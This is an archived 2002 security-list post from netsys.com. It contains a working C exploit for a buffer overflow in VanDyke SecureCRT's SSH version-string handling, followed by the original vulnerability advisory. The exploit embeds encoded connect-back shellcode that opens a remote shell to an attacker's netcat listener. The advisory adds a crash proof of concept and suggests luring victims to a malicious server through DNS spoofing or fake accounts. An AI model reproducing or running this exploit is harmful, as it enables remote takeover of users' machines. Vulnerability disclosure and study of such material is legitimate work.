NETSYS.COM - The Intelligent Hacker's Choice - http://www.netsys.com/library/securecrt-2002-07-24.txtThe Intelligent Hacker's Choice.. Systems, Networks, Administration.. since 1977 >>>> advertisement The following code is a remote shell exploiting the bug discovered by Kyuzo... it use netcat bye // The bug was discovered by Kyuzo // The schell code exploit was coded by Andrea Lisci // The program working in the following way // // run the exploit //./shellcode // run the netcat // nc -l -p // connect from secureCRT to the port 9988 using ssh version 1 // // the remote shell will be opened at netcat computer #include #include #include #include #define PORT 9988 int main(int argc, char **argv) { int s, n, i, sz = sizeof(struct sockaddr_in); struct sockaddr_in local, whatever; char payload[2510], *pshell; unsigned char preshell[]="\xb8\x00\x03\xff\xe0"; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; unsigned char shell[] = "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84" "\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20" "\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0"; a_port=htons(atoi(argv[2])); a_port ^= 0x9595; //ht=gethostbyname(argv[1]); //a_host= (unsigned long) *(ht->h_addr); a_host=inet_addr(argv[1]); a_host ^= 0x95959595; shell[385]= ((a_port) & 0xff); shell[386]= ((a_port >> 8 ) & 0xff); shell[390]= ((a_host) & 0xff); shell[391]= ((a_host >> 8) & 0xff); shell[392]= ((a_host >>16) & 0xff); shell[393]= ((a_host >>24) & 0xff); memset(payload,0x90,sizeof(payload)); strcpy(payload, "SSH-1.1-"); for (i = 8; i < 267; i++) payload[i] = 'A'; payload[i+1]=0x00; payload[i+2]=0xbb; payload[i+3]=0x12; payload[i+4]=0x00; payload[i+5] = '\n'; payload[i+6]= '\0'; pshell=&payload; pshell+=100; memcpy(pshell,preshell,sizeof(preshell)); pshell=&payload; pshell+=300; memcpy(pshell,shell,sizeof(shell)); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return 1; } local.sin_family = AF_INET; local.sin_port = htons(PORT); local.sin_addr.s_addr = INADDR_ANY; memset(&(local.sin_zero), 0, 8); if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); return 1; } if (listen(s, 2) == -1) { perror("listen"); return 1; } printf("waiting for connection...\n"); if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) { perror("accept"); return 1; } printf("client connected\n"); if (send(n, payload, sizeof(payload) - 1, 0) == -1) { perror("send"); return 1; } printf("sent string: [%s]\n", payload); close(n); close(s); return 0; } ----- Original Message ----- From: "Kyuzo" To: Sent: Tuesday, July 23, 2002 5:09 AM Subject: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta > SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug in a > seemlingly trivial portion of its SSH connection code. When an SSH Client > connects to a server, the server sends a version string containing minor and > major numbers for the protocol, as well as a server-specific identifier string > which is specified to be no more than 40 bytes long. Unfortunetly the SecureCRT > code which handles errors relating to an unsupported protocol version contains > an unchecked buffer overflow when dealing with this identifier string. > > The following C code is given to reproduce this bug (yes I know Perl would have > been shorter, sorry): > > #include > #include > #include > #include > > #define PORT 9988 > > int main(int argc, char **argv) { > int s, n, i, sz = sizeof(struct sockaddr_in); > struct sockaddr_in local, whatever; > char payload[510]; > > strcpy(payload, "SSH-1.1-"); > for (i = 8; i < 508; i++) > payload[i] = 'A'; > payload[508] = '\n'; > payload[509] = '\0'; > > if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { > perror("socket"); > return 1; > } > local.sin_family = AF_INET; > local.sin_port = htons(PORT); > local.sin_addr.s_addr = INADDR_ANY; > memset(&(local.sin_zero), 0, 8); > if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { > perror("bind"); > return 1; > } > if (listen(s, 2) == -1) { > perror("listen"); > return 1; > } > printf("waiting for connection...\n"); > if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) { > perror("accept"); > return 1; > } > printf("client connected\n"); > if (send(n, payload, sizeof(payload) - 1, 0) == -1) { > perror("send"); > return 1; > } > printf("sent string: [%s]\n", payload); > close(n); > close(s); > return 0; > } > > After starting the (fake) server, run the SecureCRT client, attach a debugger > and connect. Notice the value of PC is now 0x41414141...coincidence? > > There are a number of ways to trick people into connecting to your ssh server, > i.e. telling them you've given them an account on your shell, dns spoofing etc. > > Big shout-out to Lagow, Biggie Smalls (up in heaven), > Gweeds, & the whole Mr. Mittens crew > > - Kyuzo > Copyright © 2003 netsys.com All Rights Reserved.